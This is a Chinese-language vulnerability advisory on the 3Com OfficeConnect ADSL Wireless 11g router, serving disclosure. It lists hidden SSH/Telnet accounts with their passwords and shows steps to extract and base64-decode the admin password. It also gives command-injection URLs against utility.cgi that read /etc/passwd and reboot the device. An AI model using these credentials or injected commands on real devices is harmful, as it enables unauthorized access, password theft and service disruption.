漏洞起因
访问验证错误
影响系统
3Com OfficeConnect ADSL Wireless 11g Firewall Router 3.0
不受影响系统
危害
远程攻击者可以利用漏洞获得对设备的访问或执行任意命令。
攻击所需条件
攻击者必须访问3Com OfficeConnect ADSL Wireless 11g Firewall Router。
漏洞信息
3Com OfficeConnect ADSL Wireless 11g Firewall Router是一款结合一个追踪所有通讯状态和内容的stateful packet检测防火墙功能的无线路由器。
3Com OfficeConnect ADSL Wireless 11g Firewall Router存在多个安全漏洞,远程攻击者可以利用漏洞获得对设备的访问或执行任意命令。
–管理员密码泄漏漏洞:
1) 使用如下隐藏帐户SSH/Telnet路由器:
support:support
user:5
nobody:admin
2) Type 9
3) Type 1
3) Type 3获得配置信息
4) 定位sysPassword字段:
<sysPassword value="cXdlcnR5Cg=="/>
5) 解码admin密码:
roland@hp6720s:~$ echo -ne "cXdlcnR5Cg==" | base64 -d
qwerty
–远程命令执行
http://1.2.3.4/utility.cgi?testType=1&IP=aaa || cat /etc/passwd
http://1.2.3.4/utility.cgi?testType=1&IP=aaa || reboot
测试方法
厂商解决方案
目前没有详细解决方案提供:
http://www.3com.com/products/en_US/detail.jsp?tab=features&sku=3CRWE754G72-A&pathtype=purchase
漏洞提供者
Andrea Fabrizi
漏洞消息链接
http://www.securityfocus.com/archive/1/507263
0 条评论。